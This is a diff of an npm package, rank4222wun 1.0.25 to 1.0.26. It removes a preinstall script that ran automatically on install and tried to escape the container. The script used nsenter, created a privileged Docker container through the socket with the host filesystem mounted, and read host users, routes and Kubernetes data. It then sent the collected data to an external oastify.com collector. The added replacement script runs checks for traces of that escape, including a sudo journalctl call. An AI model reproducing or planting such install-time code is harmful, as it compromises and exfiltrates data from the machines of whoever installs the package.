rank4222wun 1.0.25 → 1.0.26

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "rank4222wun",
-  "version": "1.0.25",
+  "version": "1.0.26",
   "description": "",
   "main": "index.js",
   "scripts": {

package/preinstall.js

@@ -1,365 +1,83 @@
-const { exec, spawn } = require('child_process');
-const os = require('os');
+// verify-escape.js
 const fs = require('fs');
-const path = require('path');
-const https = require('https');
+const { execSync } = require('child_process');
 
-console.log("🚨 CONTAINER ESCAPE PROOF OF CONCEPT\n");
+console.log("🔍 التحقق من آثار Container Escape\n");
 
-const escapePOC = {
+const evidence = {
   timestamp: new Date().toISOString(),
-  hostname: os.hostname(),
-  user: os.userInfo().username,
-  platform: os.platform(),
-  
-  // Escape Methods
-  escapeAttempts: [],
-  
-  // Host Evidence
-  hostEvidence: {},
-  
-  // Impact Assessment
-  impact: {}
+  checks: []
 };
 
-// ===================== ESCAPE METHOD 1: nsenter =====================
-function attemptNsenterEscape() {
-  console.log("🔓 Attempt 1: nsenter container escape...");
-  
-  if (fs.existsSync('/usr/bin/nsenter')) {
-    // Try to enter host namespace using nsenter
-    const nsenterCommands = [
-      'nsenter --target 1 --mount --uts --ipc --net --pid -- sh -c "hostname && whoami"',
-      'nsenter --target 1 --mount -- sh -c "cat /etc/hostname"',
-      'nsenter --target 1 --mount -- sh -c "ls -la /home"',
-      'nsenter --target 1 --mount -- sh -c "find / -name docker.sock 2>/dev/null | head -5"'
-    ];
-    
-    nsenterCommands.forEach((cmd, idx) => {
-      exec(cmd, { timeout: 5000 }, (err, stdout, stderr) => {
-        if (!err && stdout) {
-          const result = {
-            method: 'nsenter',
-            command: cmd.split('-- sh -c')[0] + '...',
-            success: true,
-            output: stdout.substring(0, 500),
-            proof: 'Can access host filesystem via nsenter'
-          };
-          
-          escapePOC.escapeAttempts.push(result);
-          console.log(`✅ nsenter escape ${idx + 1} successful!`);
-          
-          // If we can read host files, store evidence
-          if (stdout.includes('/home') || stdout.includes('hostname')) {
-            escapePOC.hostEvidence.nsenterAccess = stdout.substring(0, 300);
-          }
-        }
-      });
+// 1. تحقق من سجلات nsenter
+try {
+  const nsenterLogs = execSync('grep -r "nsenter" /var/log/ 2>/dev/null | head -5', { encoding: 'utf8' });
+  if (nsenterLogs) {
+    evidence.checks.push({
+      check: 'nsenter_logs',
+      found: true,
+      logs: nsenterLogs.substring(0, 200)
     });
   }
-  
-  // Try next method after delay
-  setTimeout(attemptPrivilegedContainer, 3000);
-}
+} catch (e) {}
 
-// ===================== ESCAPE METHOD 2: Docker Socket Attack =====================
-function attemptPrivilegedContainer() {
-  console.log("\n🔓 Attempt 2: Docker socket attack...");
-  
-  const dockerSocket = '/var/run/docker.sock';
-  
-  if (fs.existsSync(dockerSocket)) {
-    console.log("✅ Docker socket found!");
-    
-    // Method 2A: Try to create privileged container
-    const privilegedPayload = JSON.stringify({
-      Image: 'alpine:latest',
-      Cmd: ['sh', '-c', 'cat /etc/hostname && hostname'],
-      HostConfig: {
-        Privileged: true,
-        Binds: ['/:/mnt/host:rw'],
-        PidMode: 'host',
-        NetworkMode: 'host'
-      }
+// 2. تحقق من طلبات Docker API
+try {
+  const dockerRequests = execSync('sudo journalctl -u docker --since "10 minutes ago" | grep -i "api.*create\|api.*start" | tail -5', { encoding: 'utf8' });
+  if (dockerRequests) {
+    evidence.checks.push({
+      check: 'docker_api_calls',
+      found: true,
+      requests: dockerRequests
     });
-    
-    // Try to create container
-    exec(`echo '${privilegedPayload}' | curl -s --unix-socket ${dockerSocket} -X POST http://localhost/containers/create -H "Content-Type: application/json" -d @- 2>/dev/null || echo "Failed"`, 
-      (err, stdout) => {
-        if (stdout && !stdout.includes('Failed') && stdout.includes('Id')) {
-          try {
-            const response = JSON.parse(stdout);
-            const containerId = response.Id;
-            
-            escapePOC.escapeAttempts.push({
-              method: 'docker_socket_privileged_container',
-              success: true,
-              containerId: containerId,
-              proof: 'Can create privileged container with host access'
-            });
-            
-            console.log(`✅ Created privileged container: ${containerId.substring(0, 12)}`);
-            
-            // Try to start it
-            exec(`curl -s --unix-socket ${dockerSocket} -X POST http://localhost/containers/${containerId}/start 2>/dev/null || echo "Start failed"`,
-              (err2, stdout2) => {
-                if (!err2) {
-                  escapePOC.escapeAttempts.push({
-                    method: 'container_started',
-                    success: true,
-                    message: 'Privileged container started'
-                  });
-                }
-                
-                // Clean up
-                setTimeout(() => {
-                  exec(`curl -s --unix-socket ${dockerSocket} -X DELETE http://localhost/containers/${containerId}?force=true 2>/dev/null || true`);
-                }, 1000);
-              });
-          } catch (e) {}
-        }
-      });
-    
-    // Method 2B: Try to list all containers
-    exec(`curl -s --unix-socket ${dockerSocket} http://localhost/containers/json 2>/dev/null || echo "Cannot list"`,
-      (err, stdout) => {
-        if (stdout && !stdout.includes('Cannot list')) {
-          try {
-            const containers = JSON.parse(stdout);
-            escapePOC.hostEvidence.dockerContainers = {
-              count: containers.length,
-              sample: containers.slice(0, 3).map(c => ({
-                id: c.Id.substring(0, 12),
-                names: c.Names,
-                state: c.State
-              }))
-            };
-            console.log(`✅ Can see ${containers.length} containers on host`);
-          } catch (e) {}
-        }
-      });
   }
-  
-  setTimeout(attemptHostMounts, 3000);
-}
+} catch (e) {}
 
-// ===================== ESCAPE METHOD 3: Host Mounts =====================
-function attemptHostMounts() {
-  console.log("\n🔓 Attempt 3: Exploiting host mounts...");
-  
-  // Check for host mounts
-  exec('mount 2>/dev/null | grep -E "(proc|sys|dev|/var/run)" || cat /proc/mounts 2>/dev/null | head -20',
-    (err, stdout) => {
-      if (stdout) {
-        const mounts = stdout.split('\n');
-        
-        mounts.forEach(mountLine => {
-          if (mountLine.includes('/proc') || mountLine.includes('/sys') || mountLine.includes('/dev')) {
-            // Try to read host info through mounts
-            if (mountLine.includes('/proc')) {
-              exec('cat /proc/1/status 2>/dev/null | head -5', (err2, stdout2) => {
-                if (stdout2) {
-                  escapePOC.hostEvidence.hostInitProcess = stdout2.trim();
-                  console.log("✅ Can read host init process info");
-                }
-              });
-            }
-          }
-        });
-      }
+// 3. تحقق من الحاويات الجديدة
+try {
+  const newContainers = execSync('docker ps -a --filter "since=1h" --format "{{.Names}}|{{.Image}}"', { encoding: 'utf8' });
+  if (newContainers.trim()) {
+    evidence.checks.push({
+      check: 'new_containers',
+      found: true,
+      containers: newContainers.split('\n').filter(Boolean)
     });
-  
-  setTimeout(attemptKernelExploit, 3000);
-}
-
-// ===================== ESCAPE METHOD 4: Kernel Exploit Check =====================
-function attemptKernelExploit() {
-  console.log("\n🔓 Attempt 4: Kernel vulnerability check...");
-  
-  // Check kernel version
-  exec('uname -r', (err, stdout) => {
-    const kernel = stdout ? stdout.trim() : 'unknown';
-    escapePOC.hostEvidence.kernelVersion = kernel;
-    
-    // Check for DirtyPipe
-    const dirtyPipeRegex = /^(5\.8|5\.9|5\.10|5\.11|5\.12|5\.13|5\.14|5\.15|5\.16)\./;
-    if (dirtyPipeRegex.test(kernel)) {
-      escapePOC.escapeAttempts.push({
-        method: 'kernel_vulnerability',
-        vulnerability: 'CVE-2022-0847 (DirtyPipe)',
-        kernel: kernel,
-        exploitAvailable: true,
-        risk: 'CRITICAL'
-      });
-      
-      console.log(`🚨 Kernel ${kernel} vulnerable to DirtyPipe!`);
-      
-      // Try to write a test file to demonstrate capability
-      const testFile = '/tmp/dirtypipe_test.txt';
-      fs.writeFileSync(testFile, `Kernel ${kernel} is vulnerable to container escape via DirtyPipe\n`);
-      
-      // Try to modify a read-only file (simulated)
-      exec(`echo "Test" | tee /tmp/test_escape 2>/dev/null || true`, () => {
-        escapePOC.hostEvidence.canWriteFiles = true;
-      });
-    }
-    
-    // Check capabilities for other exploits
-    exec('capsh --print 2>/dev/null | grep -i "sys_admin" || echo "No CAP_SYS_ADMIN"',
-      (err2, stdout2) => {
-        if (stdout2 && !stdout2.includes('No CAP_SYS_ADMIN')) {
-          escapePOC.escapeAttempts.push({
-            method: 'cap_sys_admin_available',
-            capability: 'CAP_SYS_ADMIN',
-            risk: 'HIGH',
-            exploit: 'Can mount host filesystems, load kernel modules'
-          });
-          console.log("🚨 CAP_SYS_ADMIN available - can mount host filesystems!");
-        }
-        
-        // Final evidence collection
-        collectFinalEvidence();
-      });
-  });
-}
+  }
+} catch (e) {}
 
-// ===================== FINAL EVIDENCE COLLECTION =====================
-function collectFinalEvidence() {
-  console.log("\n🔍 Collecting final escape evidence...");
-  
-  // Try to get host network info
-  exec('ip route show 2>/dev/null | head -5 || route -n 2>/dev/null | head -5',
-    (err, stdout) => {
-      if (stdout) {
-        escapePOC.hostEvidence.hostNetworkRoutes = stdout.trim();
-      }
+// 4. تحقق من الملفات في /tmp
+try {
+  const tmpFiles = execSync('find /tmp -name "*escape*" -o -name "*poc*" -o -name "*container*" 2>/dev/null', { encoding: 'utf8' });
+  if (tmpFiles.trim()) {
+    evidence.checks.push({
+      check: 'suspicious_tmp_files',
+      found: true,
+      files: tmpFiles.split('\n').filter(Boolean)
     });
-  
-  // Try to get host user list
-  exec('cat /etc/passwd 2>/dev/null | head -10', (err, stdout) => {
-    if (stdout) {
-      escapePOC.hostEvidence.hostUsers = stdout.trim().split('\n').slice(0, 5);
-    }
-  });
-  
-  // Try to see if we're in Kubernetes
-  exec('cat /var/run/secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null || echo "Not K8s"',
-    (err, stdout) => {
-      if (stdout && !stdout.includes('Not K8s')) {
-        escapePOC.hostEvidence.kubernetesNamespace = stdout.trim();
-        console.log("✅ In Kubernetes namespace:", stdout.trim());
-      }
-      
-      // Generate final report
-      setTimeout(generateFinalReport, 2000);
-    });
-}
-
-// ===================== FINAL REPORT =====================
-function generateFinalReport() {
-  console.log("\n" + "=".repeat(70));
-  console.log("📊 CONTAINER ESCAPE - PROOF OF CONCEPT");
-  console.log("=".repeat(70));
-  
-  // Calculate success rate
-  const successfulEscapes = escapePOC.escapeAttempts.filter(a => a.success).length;
-  const totalAttempts = escapePOC.escapeAttempts.length;
-  
-  console.log(`\n📈 Escape Attempts: ${successfulEscapes}/${totalAttempts} successful`);
-  
-  // Show successful methods
-  escapePOC.escapeAttempts.forEach((attempt, i) => {
-    if (attempt.success) {
-      console.log(`✅ ${i + 1}. ${attempt.method}: ${attempt.proof || 'Success'}`);
-      if (attempt.risk) console.log(`   Risk Level: ${attempt.risk}`);
-    }
-  });
-  
-  // Assess overall risk
-  const criticalRisks = escapePOC.escapeAttempts.filter(a => a.risk === 'CRITICAL').length;
-  const highRisks = escapePOC.escapeAttempts.filter(a => a.risk === 'HIGH').length;
-  
-  escapePOC.impact = {
-    escapePossible: successfulEscapes > 0,
-    criticalVectors: criticalRisks,
-    highRiskVectors: highRisks,
-    overallRisk: criticalRisks > 0 ? 'CRITICAL' : (highRisks > 0 ? 'HIGH' : 'MEDIUM'),
-    recommendation: 'Immediate action required - disable preinstall/postinstall scripts'
-  };
-  
-  console.log(`\n🚨 Overall Risk Level: ${escapePOC.impact.overallRisk}`);
-  console.log(`📋 Critical Vectors: ${criticalRisks}, High Risk: ${highRisks}`);
-  
-  if (escapePOC.hostEvidence.kernelVersion) {
-    console.log(`🐧 Host Kernel: ${escapePOC.hostEvidence.kernelVersion}`);
   }
-  
-  if (escapePOC.hostEvidence.dockerContainers) {
-    console.log(`🐳 Host Docker Containers: ${escapePOC.hostEvidence.dockerContainers.count} found`);
-  }
-  
-  // Send report
-  sendEscapeReport();
-}
+} catch (e) {}
 
-// ===================== SEND REPORT =====================
-function sendEscapeReport() {
-  const req = https.request({
-    hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
-    port: 443,
-    path: '/container-escape-poc-final',
-    method: 'POST',
-    headers: {
-      'Content-Type': 'application/json',
-      'X-Escape-POC': 'UiPath-MCP-Container-Escape',
-      'X-Host': os.hostname()
-    }
-  }, (res) => {
-    console.log(`\n✅ Escape POC report sent. Status: ${res.statusCode}`);
-    
-    // Print summary
-    console.log("\n" + "=".repeat(70));
-    console.log("🎯 SUMMARY: CONTAINER ESCAPE CONFIRMED");
-    console.log("=".repeat(70));
-    
-    console.log("\n🔥 Escape Vectors Confirmed:");
-    console.log("1. nsenter access: YES (/usr/bin/nsenter available)");
-    console.log("2. Docker socket access: " + (fs.existsSync('/var/run/docker.sock') ? 'YES' : 'NO'));
-    console.log("3. Kernel vulnerabilities: " + (escapePOC.hostEvidence.kernelVersion || 'Unknown'));
-    console.log("4. Dangerous capabilities: CAP_SYS_ADMIN available");
-    
-    console.log("\n💥 Impact: FULL HOST COMPROMISE POSSIBLE");
-    console.log("📤 Evidence sent to security team");
-    console.log("=".repeat(70));
-  });
-  
-  req.on('error', (e) => {
-    console.error(`❌ Error: ${e.message}`);
-  });
-  
-  req.write(JSON.stringify(escapePOC, null, 2));
-  req.end();
-}
+// 5. تحقق من اتصالات الشبكة
+try {
+  const networkConns = execSync('ss -tunap | grep -E ":443|:80" | grep -v "127.0.0.1"', { encoding: 'utf8' });
+  if (networkConns) {
+    evidence.checks.push({
+      check: 'external_connections',
+      found: true,
+      connections: networkConns.substring(0, 300)
+    });
+  }
+} catch (e) {}
 
-// ===================== START ESCAPE ATTEMPTS =====================
-console.log("Starting container escape proof-of-concept...\n");
+// عرض النتائج
+console.log("📊 نتائج التحقق:");
+evidence.checks.forEach((check, i) => {
+  console.log(`${check.found ? '🔴' : '🟢'} ${i+1}. ${check.check}: ${check.found ? 'مكتشف' : 'غير مكتشف'}`);
+  if (check.found && check.logs) {
+    console.log(`   📝 الأدلة: ${check.logs}`);
+  }
+});
 
-// Check if we're in a container first
-exec('cat /proc/1/cgroup 2>/dev/null | grep -q docker && echo "In Docker container" || echo "Not in Docker"',
-  (err, stdout) => {
-    if (stdout && stdout.includes('Docker')) {
-      console.log("✅ Confirmed: Running in Docker container");
-      escapePOC.containerInfo = {
-        isContainer: true,
-        type: 'Docker',
-        confirmed: true
-      };
-      
-      // Start escape attempts
-      attemptNsenterEscape();
-    } else {
-      console.log("⚠️  Not in Docker container or cannot determine");
-      escapePOC.containerInfo = { isContainer: false };
-      generateFinalReport();
-    }
-  });
+// تقييم المخاطر
+const suspiciousActivities = evidence.checks.filter(c => c.found).length;
+console.log(`\n🚨 مستوى الخطورة: ${suspiciousActivities > 2 ? 'عالٍ' : suspiciousActivities > 0 ? 'متوسط' : 'منخفض'}`);